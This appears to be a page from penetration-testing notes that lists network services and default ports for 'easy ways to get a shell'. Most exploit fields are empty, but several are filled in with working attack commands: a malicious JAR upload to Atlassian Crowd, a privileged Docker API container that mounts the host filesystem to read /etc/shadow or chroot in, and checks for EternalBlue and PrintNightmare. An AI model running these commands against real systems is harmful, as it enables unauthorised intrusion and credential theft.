Low-Hanging Fruit

Easy ways to get a shell

Services

Adobe ColdFusion BlazeDS

Ports: 8080 Exploit:

Apache Flink

Ports: 5000 Exploit:

Apache Hadoop

Ports: 8088 Exploit:

Apache Solr

Ports: 8983 Exploit:

Apache Spark

Ports: 6066 Exploit:

Atlassian Crowd

Ports: 4990 Exploit:

curl -k -H "Content-Type: multipart/mixed" \ --form "file_cdl=@rce.jar" http://[HOST]:4990/crowd/admin/uploadplugin.action

Cisco Smart Install

Ports: 4786 Exploit:

Cisco Unified Communications Manager

Ports: 6970 Exploit:

curl http://[CUCM IP Address]:6970/ConfigFileCacheList.txt

Dameware

Ports: 6129 Exploit:

Dell iDrac

Ports: 443

Exploit:

Docker API

Ports: 2375 Exploit:

docker -H [host]:2375 run --rm -it --privileged --net=host -v /:/mnt alpine

File Access: cat /mnt/etc/shadow
Remote Code Execution: chroot /mnt

GlassFish

Ports: 4848 Exploit:

Hashicorp Consul

Ports: 8500 Exploit:

HP Data Protector

Ports: 5555, 5556 Exploit:

HP iLO

Ports: 80, 443

Exploit:

IBM Websphere

Ports: 8880 Exploit:

IPMI

Ports: 623 Exploit:

Java RMI

Ports: 1090, 1098, 1099, 4444, 11099, 47001, 47002, 10999 Exploit:

JBoss

Ports: 4444, 4445, 11111 Exploit:

JDWP

Ports: 5005 - 5009, 45000, 45001 Exploit:

JMX

Ports: 8686, 9012, 50500 Exploit:

MS17-010: Eternal Blue

Ports 139, 445

Exploit:

nmap -Pn -sV --script smb-vuln-ms17-010 -p139,445 $ip

Portainer

Ports: 9000 Exploit:

PrintNightmare

crackmapexec smb $host_file -u $username -p $password -M spooler

Redis

Ports: 6379 Exploit:

SAP

Ports: 3300 Exploit:

WebLogic

Ports: 7000-7004, 7070, 7071, 8000-8003, 9000-9003, 9503 Exploit:

Zoho Manageengine Desktop

Ports: 8383 Exploit:

References

PreviousTimestomping NextNetworks

Last updated 1 year ago